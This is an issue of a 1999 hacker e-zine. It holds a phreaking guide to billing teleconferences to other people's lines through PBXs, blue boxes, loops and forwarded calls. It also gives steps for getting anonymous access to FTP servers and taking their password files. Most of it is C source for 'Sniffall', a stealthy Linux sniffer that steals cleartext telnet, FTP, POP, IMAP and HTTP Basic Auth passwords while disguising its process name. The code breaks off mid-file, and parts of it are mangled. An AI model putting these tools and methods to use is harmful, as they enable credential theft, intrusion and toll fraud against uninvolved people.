-=[ United Hackers Association 1 - Magazine, Issue VII ]=- May 08, 1999 Editor : Chiraz (Chiraz@ThePentagon.com) Homepage : http://www.uha1.com/ WE ARE NOT RESPONSIBLE FOR ANYTHING YOU DO WITH THIS TEXT FILE OR ANY TROUBLE YOU GET INTO, OUR ISP OR ANYWHERE ELSE THIS TEXT FILE IS HOSTED WILL NOT BE RESPONSIBLE EITHER. We can manipulate you however we want. We can read and change your personal datas. We can take your identity. Kill your existence. We can come near to you from everywhere in the world. You can't escape! -by the file ripper [Prezident/Founder of UHA] Index: ----------------------------- .......Submissions........... .......Editor's Note.........Chiraz ..Alliance Teleconferencing..LITTLE DEVIL ..Hacking low/sec. FTP's.....Cyber.Priest ..Sniffall.c (source code)...Markj8 .So you want to be a hacker?.-coldfire .........NT Warfare..........Rhino9 team .Managing window's threads...Chiraz ....IBM + Win95 Hacking......El Salvador ......Subscriptions.......... .......Join UHA.............. ------------------------------ If you want, post this text on Homepages/BBS/Ftp/Newsgroups etc. It's free, but please don't change anything without our permission!! The whole html/jpg version can be downloaded from the welcome page on the on-line magazine. --> http://www.uha1.com/magazine/7/ <-- ========================================================= If you want to publish one of your texts in our Magazine, just mail us your text to : Chiraz@ThePentagon.com All texts are welcome! ========================================================= -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Editors Note (by Chiraz) Hi all, Welcome back to the magazine, it has been a while since the last one, but I'm back! We received some emails from people wanting to add to our magazine, although most were added, others were not because of too basic content or arrogance (shit, I hate those ppl who actually discovered Linux and now raging and screaming in text files, claiming that they are hackers and Gods...). Further content received does not work or is incorrect, for instance a newbie text about sending anonymous email by telnet (go figure!). Actually, to give an example what got submitted, another text contained the line "The difference between a HACKER and a lamer is that a hacker doesn�t says what he knows and a lamer doesn�t knows what he says" (So, if hackers don't share, did you learn everything from lamers? ed.) One text in the magazine is not for the people already hacking or exploring, but still I really wanted to add it, since I was compelled by the way it was written and gives a good definition and feeling why hackers "hack" and although it's not technically advanced and revelating, it's well targeted at it's group, as well contains a well-written analysis of psychological needs and 'drives' of a hacker. So my personal greetz go to -coldfire for writing and submitting it. Another greet to LITTLE DEVIL, PRESIDENT AND FOUNDER OF LDD AND UHS, he was so kind to style his submission in the style I try to use. Well, you'll find the links on the left, enjoy the pages. Meanwhile, I was very busy and still am writing the magazine, with researching and more. Some of you into programming and not into processes yet will find my previous examples good material to work with/from, (the NT/win9x processes example and the BO protocol)... this time I'm focusing more on threads in the windows architecture, how to create them, manage them and discard them without causing runtime errors on your system (that is, hopefully, you'll know what I mean :) If you find some optimizations for the routines, please submit, I'm willing to post corrections and other things. I'm delving into cryptography, so I decided to start on an article on applying cryptography. My goal is to give you source code examples, explanations etc. and I hope that in the end you'll have a working model in your head from where you can start developing your own protocols and break your little sister's encryption (hehe). Moreover, I want to aim at which cryptos are well suited to which application. Whether I'll complete it I dunno, but let's see how far we come. Maybe some ppl out there will react very positively on this and will decide to add their own content and protocols to it. (!hint!) I expect the first edition of this article to come out next time, so you'll have to be patient a bit to give me time to explore. For now, enjoy the article about threads in the windows architecture, it's programmed in Delphi, that means readable to many people and exportable to C++ for all those guru's out there (they'll know threads most likely already any way, when they're programming C++) Have a nice time reading the #7 magazine, and keep submitting your works and articles, it's always fun to read and see submissions from new people. Greetz, ed. (Chiraz) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Basic Alliance Teleconferencing (BY LITTLE DEVIL) Introduction: This phile will deal with accessing, understanding and using the Alliance Teleconferencing Systems.... it has many sections and for best use should be printed out...enjoy... Alliance: Alliance Teleconferencing is an independant company which allows the general public to access and use it's conferencing equipment. Many rumors have been floating apound that Alliance is a subsidary of AT&T. Well, they are wrong. As stated above, Alliance is an entirely independant company. They use sophisticated equipment to allow users to talk to many people at once. The Number: Alliance is in the 700 exchange, thus it is not localized, well, not in a way. Alliance is only in certain states, and only residents of these certain states can access by dialing direct. This, however, will be discussed in a later chapter. The numbers for alliance are as follows: 0-700-456-1000(chicago) -1001 (los angeles) -1002 (chicago) -1003 (houston) -2000 (?) -2001 (?) -2002 (?) -2003 (?) -3000 (?) -3001 (?) -3002 (?) -3002 (?) The locations of the first 4 numbers are known and i have stated them. However, the numbers in the 200x and 300x are not definately known. Rumor has it that the pattern repeats itself but this has not been proven. Dialing: As stated before, Alliance is only in certain stated and only these states can access them via dialing direct. However, dialing direct causes your residence to be charged for the conference and conference bills are not low!!! Therefore, many ways have been discovered to start a conference without having it billed to ones house. They are as follows: 1) Dialing through a PBX 2) Incorporating a Blue Box 3) Billing to a loop 4) Billing to a forwarded call I am sure there are many more but these are the four i will deal with. Dialing through a PBX: Probably the easiest method of creating a free conference is through a PBX. Simply call one in a state that has Alliance, input the PBX's code, dial 9 for an outside line and then dial alliance. An example of this would be: PBX: 800-241-4911 When it answers it will give you a tone. At this tone input your code. Code: 1234 After this you will receive another tone, now dial 9 for an outside line. You will now hear a dial tone. Simply dial Alliance from this point and the conference will be billed to the PBX. Using a Blue Box: Another rather simple way of starting a conference is with a Blue Box. The following procedure is how to box a conference: Dial a number to box off of. In this example we will use 609-609-6099 When the party answers hit 2600hz. This will cause the fone company's equipment to think that you have hung up. You will hear a You have now 'seized' a trunk. After this, switch to multi- frequencyand dial: KP-0-700-456-x00x-STKP=KP tone on Blue Boxx=variable between 1 and 3ST=ST tone on Blue Box The equipment now thinks that the operator has dialed Alliance from her switchboard and the conference shall be billed there. Since Blue Boxing is such a large topic, this is as far as I will go into it's uses. Billing to a loop: A third method of receiving a free conference is by billing out to aloop. A loop is 2 numbers that when two people call, they can talkto each other. You're saying woop- tee-do right? Wrong! Loops can be usefull to phreaks. First, dial alliance direct. After goingthrough the beginning procedure, which will be discussed later in thistutorial, dial 0 and wait for an Alliance operator. When she answerstell her you would like to bill the conference to such and such anumber. (A loop where your phriend is on the other side) She will then call that number to receive voice verification.Of course your phriend will be waiting and will accept the charges.Thus, the conference is billed to the loop. Billing to call forwarding When you dial a number that is call forwarded, it is first answered by the original location, then forwarded. The original location will hang up if 2600hz is received from only ond end of the line. Therefore, if you were to wait after the forwarded residence answered, you would receive the original location's dial tone. Example Dial 800-325-4067 The original residence would answer, then forward the call, a second type of ringing would be heard. When this second residence answers simply wait until they hang up. After about twenty seconds you will then receive the original residence's dial tone since it heard 2600hz from one end of the line. Simply dial Alliance from this point and the conference will be billed to the original residence. These are the four main ways to receive a free conference. I am sure many more exist, but these four are quite handy themselves. Logon Procedure: Once Alliance answers you will hear a two-tone combination. This is their way of saying 'How many people do you want on the conference dude?' Simply type in a 2-digit combination, depending on what bridge of Alliance you are on, between 10 and 59. After this either hit '*' to cancel the conference size and inout another or hit '#' to continue. You are now in Alliance Teleconferencing and are only seconds away from having your own roaring conference going strong!!! Dialing in Conferees: To dial your first conferee, dial 1+npa+pre+suff and await his/her answer. npa=area code pre=prefix suff=suffix If the number is busy, or if no one answers simply hit '*' and your call will be aborted. But, if they do answer, hit the '#' key. This will add them to the conference.Now commence dialing other conferees. Joining our Conference: To join your conference from control mode simply hit the '#' key. Within a second or two you will be chatting with all your buddies. To go back into control mode, simply hit the '#' key again. Transferring Control: To transfer control to another conferee, go into control mode, hit the # 6+1+npa+pre+suff of the conferee you wish to give control to. If after, you wish to abort this transfer hit the '*' key. :Transfer of control is often not available. When you receive a message stating this, you simply cannot transfer control. Muted Conferences: To request a muted conference simply hit the 9 key. I am not exactly sure what a muted conference is but it is probably a way to keep unwanted eavesdroppers from listening in. Dialing Alliance Operators: Simply dial 0 as you would from any fone and wait for the operator to answer. Ending Your Conference: To end your conference all together, that is kick everyone including yourself off, go into control mode and hit '*'...after a few seconds simply hang up. Your conference is over. Are Alliance Operators Dangerous? No. Not in the least. The worst they can do to you while you are having a conference is drop all conferees including yourself. This is in no way harmful, just a little aggravating. Alliance and Tracing: Alliance can trace, as all citizens of the United States can. But this has to all be pre-meditated and AT&T has to be called and it's really a large hastle, therefore, it is almost never done. Alliance simply does not want it known that teenagers are phucking them over. The only sort of safety equipment Alliance has on-line is a simple pen register. This little device simply records all the numbers of the conferees dialed. No big deal. All Alliance can do is call up that persons number, threaten and question. However, legally, they can do nothing because all you did was answer your fone. :Almost all instructions are told to the person in command by Alliance recordings. A lot of this tutorial is just a listing of those commands plus information gathered by either myself or the phellow phreaks of the world!!! BY LITTLE DEVIL drop me a line:LITTLE DEVIL -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= ~ HACKING LOW SECURITY FTPs ~ ~ written by ~ ~ Cyber.Priest ~ 04.04.99 One of the oldest approaches to hacking FTP's on UNIX and LINUX servers is using an very old exploit that still has not been fixed, the file stored in etc/usr/passwd or etc/usr/shadow. This now is a very outmoded approach to hacking FTP's , as more often then not you will be given select few "HELP" options , when accessing the server "anonymously." What is FTP? FTP is an acronym for File Transfer Protocol. FTP is a "service" run by a server (the unix/linux/winnt box you are connecting to) on port 21. The purpose of FTP is to act as a gateway to the client (you) so that you can exchange files with the server (them). FTP is this gateway. FTP was created for this reason, so that people can exchange files, and so was made quite friendly, all too friendly. We will take advantage of their over-friendliness to compromise the FTP. In this article I will explain how to detect and compromise low security FTP sites. What you do with them after you've conquered them is your business - you can steal files containing important info, modify files, etc. Without further ado, let us analyze your current situation: - DOS FTP HACK - More often then not , hackers have a "target" in mind when hacking. And approach this goal with every possible "exploit" they have knowledge of pertaining to that particular computer system or OS. I personally will execute the following procedures: Open DOS. type ftp. 1) select one of 2 possible protocols to begin our ftp hack session. www. or ftp. 2) select any combination of numbers and letters. my convention is to select 1-6 letter and or numbers or a combination of both. Lets go with "passwd." we now have ftp www.password. 3) Now we must close this address with one of the following extensions. .com , .net , .org , .jp , .gov * * note: I strongly advise you avoid this option like the plague for the time being. In this instance I have selected .net. 4) We now have an random produce address of www.passwd.net , thus youre DOS prompt should resemble the following: c:> ftp www.passwd.net . Now hit enter and wait to see if you receive an connection to this addresses FTP port 21. One of 3 things will take place. 1) you receive the following successful connection prompt: "etc.passwd.net:(none)): " . congratulations you found an ftp to possibly hack. 2) Unknown Host www.passwd.net sorry no luck here. 3) Connection Received: 101273 or 10028 etc. sorry , looks good but still no luck. Now we will assume you connected to an ftp via dos. at the first prompt enter "anonymous". Note: leave the " out . then hit enter. you will now receive 1 of 3 responses: 1) "anonymous login ok , please send youre complete email address as password." Congratulations you are about to gain anonymous access to this ftp server. now enter any email address and gain access. Note: never use your, nor anyone else�s real email address. try user@server.com . or any thing you can think of. 2) "anonymous login not accepted." sorry this ones a no go. 3) " pass word needed for anonymous log in." This one is often tricky. try anonymous or guest as a password. maybe 3/10 times you will slide in. 2 other options are to try guest as a log in and pass, or hit enter on both prompts. these both will give you an undeterminable access about 1/10 times. Ok now we are in: enter the command "ls" you will be given a list of directories you can check out and/or down load. What we are looking for is a file called "passwd" . This may also come as passwd.bak , passwd.group , passwd.sal. there may be more Im yet to encounter. how ever if it says passwd then you want it. You very well may find nothing on the first ls command but a list of useless files. Then give the following command " cd ../etc " and enter. now give the ls command. here you should 50 % of the time find 1 or more passwd files. To get these files give the command , mget passwd (or whatever the passwd file is called). you will now get a prompt asking "Set word A mget passwd ?: " enter Y and hit enter. you will be told how much data you are receiving in bytes. generally 50-500, though I�ve found up to 500 000 bytes which was a full page. Sit and wait as it down loads. well done. Im very quickly going to cover what you have just accomplished. On the connection to the FTP you used what is known as a "default login" command, "anonymous". This is one of the many "defaults" that come preprogrammed with an FTP server. Often times these "defaults" are either removed for security purposes , left in for the general publics use or just abscente mindedly left open. If you type the command "help" once you have gained "anonymous" access , you will be given a list of other commands you have at youre disposal to search this servers FTP. I encourage you to execute these commands in varied combinations in order to get a feel for UNIX. What you are find with the "HELP" command is a UNIX MENU shell , an very minor UNIX command system. the " .. " I have introduced you to is called a "parent diretory" . a single " . " is known as the "child directory." Any serious and dedicated "Neophyte" would either purchase a UNIX manual to learn the OS or find one on line, as there are plenty of them on-line. Try typing the command "help" in combination with any of the menu commands you see. i.e " help cd " to get an brief description of the command. FTP SECURITY More often than not , the moment you login to any server , both youre IP and Hostnamewill be recorded to the ftp's logfile along with all activity you take while in this system. Carnage00 of HFX has located an security program known as "Gaurd Dog" on this very server. And in this case it seems that it holds 4 logfiles , thus you are logged 4 times. There are measures that can be taken to cover youre tracks, that will be coverd in my Neophytes Introduction to Hacking/Cracking/Phreaking/Virii. ---------------------------------------------------------- Now you may have downloaded a shadowed pass word file or encrypted file from the FTP. shadowed: forget it. shadowed is when you see an * , - , x where the pass word should be. There are ways to unshadow these files but Im not going to cover that this file. encrypted: I advise you go find an cracking program called "Cracker Jack". it should come with a help file. Im not covering cracking in this file. I will be in my future files. Once you have either "cracked" and encrypted pass word file or found an unencrypted file you will want to reconnect to either port 21 (telnet) or 23 (ftp) on that address you hacked using the information found in the password file. how do you know what all that info means on the password file ? : Example: john:101xhg:432:16:john doe:/home/dir/john:/bin/john - this is how it is broken down - Username: john User ID # : 432 Password: 101xhg note: passwords not "shadowed" will be encrypted. Group ID : 16 Gecos : john doe note: MetGod of HFX points out that other info may be placed here instead home dir : /home/dir/john such as phone #'s , birth dates etc. shell : /bin/john note: home dir , would be this accounts home directory where its personal files are stored. shell , is this accounts Operating System , wich effects what commands may be executed from this account. NOTE: THIS FILE WAS COMPOSED FOR EDUCATIONAL PURPOSES ALONE. I TAKE NO RESPONSIBILLITY FOR ANY WHOM USE THIS KNOWLEDGE ILLEGALLY. This file may be distributed freely as long as its contents remain unedited in any manner and the true authors handle remains on this file. Please forward any comments or questions to: Cyber.Priest@sympatico.ca ~ Cyber.Priest~ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Sniffall.c (by Markj8) /* * * Sniffall for Linux * * Based on: * LinSniffer 0.03 [BETA] * Mike Edulla * medulla@infosoc.com * * and also based on: * Webb Sniff * Coded by BeastMaster V (email to bryan@scott.net) * http://www.rootshell.com * * DESCRIPTION: * Webb Sniff: This program sniffs packets destined for * webservers and scans for headers with Basic Auth and * then automatically decodes the auth. string giving a * username/passwd in cleartext. * * Linsniffer: sniffs plaintext passwords from: * telnet, rlogin, FTP, pop2, pop3, poppasswd, imap2 * * "Enhancements" by markj8: * Combined the two programs mentioned above, fixing a couple of * BeastMaster's bugs along the way. * POP3 once only logging using in-memory binary tree. * Longer telnet & rlogin session logging (See who is typing what...). * Option to NOT set promiscuous mode since its useless on 10baseT et al. * Option to log ALL HTTP requests (who is visiting what web site). * Simple obfuscation of log file using ~ & ^ * * TODO: * Dump pop passwords on sig HUP & fflush log * Investigate signal...... */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include extern int errno; #define WEB_PORT1 80 /* Standard */ #define WEB_PORT2 8080 /* Normal proxy */ #define WEB_PORT3 3128 /* Squid-cache default */ #define CAP_LEN 1024 /* bytes */ #define TIMEOUT 30 /* seconds */ #define TELNET_CAP_LEN 5000 /* For extended logging of */ #define TELNET_TIMEOUT 600 /* telnet & rlogin sessions */ #define LBUFFL 512 #define INTERFACE "eth0" #define SPACELEFT(buf, ptr) (sizeof buf - ((ptr) - buf)) struct BASE64_PARAMS { unsigned long int accum; int shift; int save_shift; }; struct etherpacket { struct ethhdr ether_header; struct iphdr ip_header; struct tcphdr tcp_header; char buff[8192]; } ether_packet; struct { unsigned long source_addr; unsigned long dest_addr; unsigned short source_port; unsigned short dest_port; int bytes_read; char active; time_t start_time; char tmp_realm[1024]; char tmp_host[512]; char pop3user[32]; char pop3pass[32]; } target; struct luser { /* Basic binary tree node for pop3 user info */ char *user; /* pointer to username */ char *pass; /* pointer to password */ int count; /* Number of times this user checked mail */ struct luser *left; /* pointer to left child of this node */ struct luser *right;/* pointer to right child of this node */ }; struct iphdr *ip; struct tcphdr *tcp; char **Argv = NULL; char *LastArgv = NULL; FILE *fp1; char lbuff[LBUFFL]; int sock; int http_verbose=0; int promiscuous=0; int obfuscate=0; struct luser *pop3tree=NULL; /* Cause creation of root entry */ /* Allocate memory for a new luser & return a pointer to them */ struct luser *luser_alloc(void) { return((struct luser *) malloc(sizeof(struct luser))); } /* Store pop3 user info or inc "Hit" count if user already here */ struct luser *tree(struct luser *p, char *u, char *w) { int cond; if (p==NULL) { /* u is a "new" user */ p=luser_alloc(); /* make a new node */ p->user=strdup(u); /* save user & store pointer */ p->pass=strdup(w); /* save pass & store pointer */ p->count=1; /* we have only seen this once */ p->left=p->right=NULL; /* this is a LEAF node */ } else { if ((cond=strcmp(u,p->user))==0) { p->count++; /* Not YOU again! */ if(strcmp(w,p->pass)) { /* If passwd has changed */ free(p->pass); /* Scrap old */ p->pass=strdup(w); /* Assume new is correct */ } } else { if (cond<0) { /* less than goes left */ p->left=tree(p->left,u,w); } else { /* greater goes right */ p->right=tree(p->right,u,w); } } } return p; /* return pointer to current node */ } char *chop(char *p) { int i; for (i=0; *(p+i); i++) if (*(p+i)=='\n') { *(p+i)='\0'; break; } return(p); } void logg(char * s) { int i=strlen(s), j, k; for (j=0;j 0) exit(0); else if (rc <0) { perror("detach"); exit(EXIT_FAILURE); } /* Now detach from the controlling terminal */ if ((fd = open("/dev/tty", O_RDWR,0)) == -1 ) { printf("couldn't open tty, assuming still okay...\n"); fflush(stdout); return; } ioctl(fd, TIOCNOTTY, 0); close(fd); /* Make us a new process group/session */ setsid(); } /* This function lets you set the current process title */ void setproctitle(const char *fmt, ...) { register char *p; register int i; char buf[2048]; va_list args; p = buf; va_start(args, fmt); (void) vsnprintf(p, SPACELEFT(buf, p), fmt, args); va_end(args); i = strlen(buf); if (i > LastArgv - Argv[0] - 2) { i = LastArgv - Argv[0] - 2; buf[i] = '\0'; } (void) strcpy(Argv[0], buf); p = &Argv[0][i]; while (p < LastArgv) *p++ = ' '; Argv[1] = NULL; } /* This function does initialization for setproctitle() */ void initsetproctitle(int argc, char **argv, char **envp) { register int i; extern char **environ; for (i = 0; envp[i] != NULL; i++) continue; environ = (char **) malloc(sizeof (char *) * (i + 1)); for (i = 0; envp[i] != NULL; i++) environ[i] = strdup(envp[i]); environ[i] = NULL; Argv = argv; if (i > 0) LastArgv = envp[i - 1] + strlen(envp[i - 1]); else LastArgv = argv[argc - 1] + strlen(argv[argc - 1]); } /* This function returns the data and time */ char * dateTime() { time_t t; char * s; time(&t); s = (char *)ctime((const time_t *)&t); s[24] = '\0'; return s; } /* Resolves a hostname via gethostbyaddr() */ char *lookup(unsigned long int network_address) { static char buf[1024]; struct in_addr my_addr; struct hostent *he; my_addr.s_addr=network_address; he=gethostbyaddr((char *)&my_addr,sizeof(struct in_addr),AF_INET); if (he==NULL) sprintf(buf,inet_ntoa(my_addr)); else sprintf(buf,he->h_name); return (buf); } void clear_target(void) { fflush(fp1); bzero(&target, sizeof(target)); } void ascii_cpy(char *dest, char *source, int max) { unsigned char c; int count=0; while((c=*(source++))&&(count' ')&&(c<127)) { *(dest++)=c; count++; } } *dest='\0'; } /* pop3, Have we seen this user before? */ /* This AssUmes that the client is automated and therefore sends */ /* lengthy packets containing strings.... rather than single chars */ /* like a telnet connection.... */ void pop3_scan(int datalen, char *data) { /* Need to scan for USER , look it up , store it & stor PASS too. */ char *word1, *word2, *p, dat[8196]; strncpy(dat,data,datalen); /* local copy of packet data */ *(dat+datalen)=0; /* ensure zero terminated string */ if(*target.pop3user) { /* We have a user, Look for pass */ word1="PASS"; word2="pass"; } else { /* Look for user */ word1="USER"; word2="user"; } p=strstr(dat,word1); if(p==NULL) p=strstr(dat,word2); if(p!=NULL) { /* word found */ p+=4; /* skip over word */ if(*target.pop3user) { /* found pass */ ascii_cpy(target.pop3pass,p,30); pop3tree=tree(pop3tree,target.pop3user,target.pop3pass); clear_target(); /* We've heard enough from you */ } else { /* found user */ ascii_cpy(target.pop3user,p,30); } } } /* FTP, Telnet etc. Scan packet data for login & password */ void ascii_scan(int datalen, char *data) { int i, prev_white=0; static bin=0, col=0; /* remember status between packets */ for(i=0; i 65)&&(!isalpha(data[i]))) { logg("\n"); col=0; } if(isspace(data[i])) prev_white=1; else prev_white=0; } } /* Converts base64 ascii to integer code */ int cvt_ascii( unsigned char alpha ) { if ( (alpha >= 'A') && (alpha <= 'Z') ) return (int)(alpha - 'A'); else if ( (alpha >= 'a') && (alpha <= 'z') ) return 26 + (int)(alpha - 'a'); else if ( (alpha >= '0') && (alpha <= '9' ) ) return 52 + (int)(alpha - '0'); else if ( alpha == '+' ) return 62; else if ( alpha == '/' ) return 63; else if ( alpha == '=' ) return -2; else return -1; } /* This does the actual base64 decoding */ void base64_decode(char *buf,int quit,struct BASE64_PARAMS *d,char *auth_buf) { int index; unsigned long int value; unsigned char blivit; unsigned short j=0; index = 0; *(auth_buf+0)='\0'; while ( isspace(buf[index] ) ) { index++; /* skip leading blanks */ } for ( index = 0; (buf[index] != '\n') && (buf[index] != '\0') && (buf[index] != ' ' ); index++) { if (index==(264-5)) return; value = cvt_ascii( buf[index] ); /* find chr in base64 alphabet */ if ( value < 64 ) /* if legal */ { d->accum <<= 6; /* assemble binary accum */ d->shift += 6; d->accum |= value; if ( d->shift >= 8 ) { d->shift -= 8; value = d->accum >> d->shift; blivit = (unsigned char)value & 0xFFl; *(auth_buf+j) = (char )blivit; j++; } } else /* else if out of base64 range */ { quit = 1; /* then finished */ break; } } *(auth_buf+j)='\0'; return; } /* This is a nice way to call the base64 decode function */ void decode(char *b64_string, char *user_buff) { struct BASE64_PARAMS d_p; int quit=0; d_p.shift = 0; d_p.accum = 0; base64_decode((char *)b64_string, quit, &d_p, user_buff); return; } /* HTTP: Checks for authorization and parses out username and password */ void parse_segment(char *data) { short i,j=0; char foo[256]; char user[128]; char pass[128]; if(http_verbose) { logg(data); logg("||\n"); } if ((!strncmp(data,"GET ",4))||(!strncmp(data,"POST ",5)) ||(!strncmp(data,"HEAD ",5))) strncpy(target.tmp_realm,data,strlen(data)); /* You may wish to change this to a more intelligent test */ if (!strncasecmp(data,"Authorization: Basic",20)) { if (strlen(data+21)>sizeof(foo)) *(data+21+sizeof(foo-1))='\0'; decode(data+21,foo); for (i=0;foo[i];i++) { if (foo[i]==':') break; user[i]=foo[i]; } user[i]='\0'; for (++i; foo[i]; i++) { pass[j]=foo[i]; j++; } pass[j]='\0'; snprintf(lbuff,LBUFFL,"\n####### [%s]\n",dateTime()); logg(lbuff); logg(target.tmp_host); snprintf(lbuff,LBUFFL, "REALM REQUESTED: %s\n", target.tmp_realm); logg(lbuff); snprintf(lbuff,LBUFFL, "---[ USER = %s PASS = %s ]---\n",user,pass); logg(lbuff); logg("#######\n\n"); clear_target(); /* We've heard enough from you */ } } /* HTTP: Read data from ether_packet.buff and parse check each line */ void http_scan(int datalen, char *data) { int i=0, t=0; char data_buff[CAP_LEN+2]; memset(target.tmp_realm,'\0',sizeof(target.tmp_realm)); sprintf(target.tmp_host,"[%s] [%d] => ",lookup(target.source_addr),ntohs(target.source_port)); sprintf(data_buff,"[%s] [%d]\n",lookup(target.dest_addr),ntohs(target.dest_port)); strcat(target.tmp_host,data_buff); if(http_verbose) { logg(target.tmp_host); logg("\n"); } data_buff[0]='\0'; for(i=0; i < datalen; i++) { if(isprint(data[i])) data_buff[t++]=data[i]; if(data[i] == 13) { data_buff[t]='\0'; parse_segment(data_buff); t=0; continue; } if(t > CAP_LEN) { data_buff[t]='\0'; t=0; parse_segment(data_buff); } } } /* Handler for segmentation violations */ void seg_fault (int sig) { exit(EXIT_FAILURE); /* Die quietly. Don't dump core! */ } void treedump(struct luser *p, FILE *fp) { if(p!=NULL) { treedump(p->left,fp); snprintf(lbuff,LBUFFL,"%s %s (%d)\n",p->user,p->pass,p->count); logg(lbuff); treedump(p->right,fp); } } void logpops(void) { logg("\nPOP3USER PASS (TIMES)\n=====================\n"); treedump(pop3tree,fp1); } void hupaction(int sig) /* Action when SIGHUP is raised */ { snprintf(lbuff,LBUFFL, "\n*** Caught SIGHUP at [%s] ***\n",dateTime()); logg(lbuff); logpops(); fflush(fp1); signal(SIGHUP,hupaction); /* Catch SIGHUP next time too */ } /* Handler when program is terminated noramlly */ void bye(int sig) { logpops(); snprintf(lbuff,LBUFFL, "\n*** Ended at [%s] by signal %d ***\n", dateTime(),sig); logg(lbuff); fclose(fp1); close(sock); exit(0); } /* Filters out all other packets except for ones we're intrested in */ int packet_filter () { int http=0; u_short dport; if (ip->protocol != IP_TCP) return (0); dport=ntohs(tcp->dest); switch(dport) { case WEB_PORT1: http=1; case WEB_PORT2: http=1; case WEB_PORT3: http=1; case IPPORT_FTP: /* ftp */ case 106: /* poppasswd */ case 109: /* pop2 */ case 110: /* pop3 */ case 143: /* imap2 */ if (target.active) { if(target.bytes_read > CAP_LEN) { if(!http) logg("\n----- [CAP_LEN Exceeded]\n"); clear_target(); return(0); } if(time(NULL) > (target.start_time + TIMEOUT)) { if(!http) logg("\n----- [Timed Out]\n"); clear_target(); return 0; } } case IPPORT_TELNET: /* telnet */ case IPPORT_LOGINSERVER: /* rlogin */ if (target.active) { if(target.bytes_read > TELNET_CAP_LEN) { logg("\n----- [TELNET_CAP_LEN Exceeded]\n"); clear_target(); return(0); } if(time(NULL) > (target.start_time + TELNET_TIMEOUT)) { logg("\n----- [TELNET Timed Out]\n"); clear_target(); return 0; } } if ((tcp->syn==1)&&(!target.active)) { /* If this is the start of a new connection and we have */ /* finished with the last one */ target.source_addr=ip->saddr; target.dest_addr=ip->daddr; target.active=1; target.source_port=tcp->source; target.dest_port=tcp->dest; target.bytes_read=0; target.start_time=time(NULL); if((http)&&(!http_verbose)) return(1); /* Don't log machine details */ if((dport==110)||(dport==109)) /* For pop3 && pop2 */ return(1); /* Don't log machine details */ snprintf(lbuff,LBUFFL, "[%s] [%d] => ",lookup(target.source_addr), ntohs(target.source_port)); logg(lbuff); snprintf(lbuff,LBUFFL, "[%s] [%d]\n", lookup(target.dest_addr), ntohs(target.dest_port)); logg(lbuff); return(1); /* Indicate new connect to interesting port */ } if(!target.active) return(0); if(ip->daddr != target.dest_addr) return 0; /* Not "target" IP */ if(ip->saddr != target.source_addr) return 0; /* We'll get you */ if(tcp->source != target.source_port) return 0; /* next time! */ if(tcp->dest != target.dest_port) return 0; if(tcp->rst == 1) { if(!http) logg("\n----- [RST]\n\n\n"); clear_target(); return(0); } if(tcp->fin == 1) { if(!http) logg("\n----- [FIN]\n\n\n"); clear_target(); return(0); } return(1); /* Indicate interesting "target" packet */ default: return(0); /* Not a packet to an interesting port */ } /* switch */ } int main ( unsigned int argc, char **argv, char **envp ) { FILE *fp2; int datalen, c, header_len; struct ifreq req; char ws[1024], sigerr[]="Can't catch"; if(signal(SIGSEGV, seg_fault)==SIG_ERR) { fprintf(stderr,"%s SIGSEGV\n",sigerr); exit(EXIT_FAILURE); } if(signal(SIGTERM, bye)==SIG_ERR) { fprintf(stderr,"%s SIGTERM\n",sigerr); exit(EXIT_FAILURE); } if(signal(SIGQUIT, bye)==SIG_ERR) { fprintf(stderr,"%s SIGQUIT\n",sigerr); exit(EXIT_FAILURE); } if(signal(SIGHUP, hupaction)==SIG_ERR) { fprintf(stderr,"%s SIGHUP\n",sigerr); exit(EXIT_FAILURE); } if(strcmp(crypt(getpass("Password: "),"SA"),"SASMtsCYrC9Go")) exit(1); /* bloodhound, but iy0moe66 would be better :^) */ printf("Decrypt existing log file (y/N) ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); if((strchr(ws,'y'))||(strchr(ws,'Y'))) { printf("Infile ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); chop(ws); if ((fp1=fopen(ws,"r"))==NULL) { fputs(strerror(errno),stderr); exit(EXIT_FAILURE); } printf("Outfile ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); chop(ws); if ((fp2=fopen(ws,"a+"))==NULL) { fputs(strerror(errno),stderr); exit(EXIT_FAILURE); } while((c=fgetc(fp1))!=EOF) { c ^= 0x55; fputc(~c,fp2); } exit(0); } if (getuid() && geteuid()) { fprintf(stderr, "\nYou need to be root to run this.\n\n"); exit(EXIT_FAILURE); } printf("Obfuscate log file (y/N) ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); if((strchr(ws,'y'))||(strchr(ws,'Y'))) obfuscate=1; memset(ws,'\0',sizeof(ws)); printf("Put what name in 'ps' list, (bash, ftp, vi ...) ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); chop(ws); printf("Setting process title to: %s\n", ws); fflush(stdout); initsetproctitle(argc, argv, envp); setproctitle("%s", ws); printf("Log ALL HTTP requests (y/N) ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); if((strchr(ws,'y'))||(strchr(ws,'Y'))) http_verbose=1; printf("Set promiscuous mode (y/N) ? "); fflush(stdout); fgets(ws,sizeof(ws),stdin); if((strchr(ws,'y'))||(strchr(ws,'Y'))) promiscuous=1; sock=socket(AF_INET, SOCK_PACKET, htons(0x800)); if (sock < 0) { fputs("Can't get SOCK_PACKET socket\n",stderr); exit(1); } strcpy(req.ifr_name, INTERFACE); if (ioctl(sock, SIOCGIFFLAGS, &req)==-1) { close(sock); fprintf(stderr,"Can't get flags: %s\n", strerror(errno)); exit(EXIT_FAILURE); } if(promiscuous) req.ifr_flags |= IFF_PROMISC; /* Set IFF_PROMISC */ else req.ifr_flags &= ~IFF_PROMISC; /* Unset IFF_PROMISC */ if (ioctl(sock, SIOCSIFFLAGS, &req)==-1) { close(sock); fprintf(stderr,"Can't set flags: %s\n", strerror(errno)); exit(EXIT_FAILURE); } printf("Enter in the full path to the logfile > "); fflush(stdout); fgets(ws,sizeof(ws),stdin); chop(ws); if 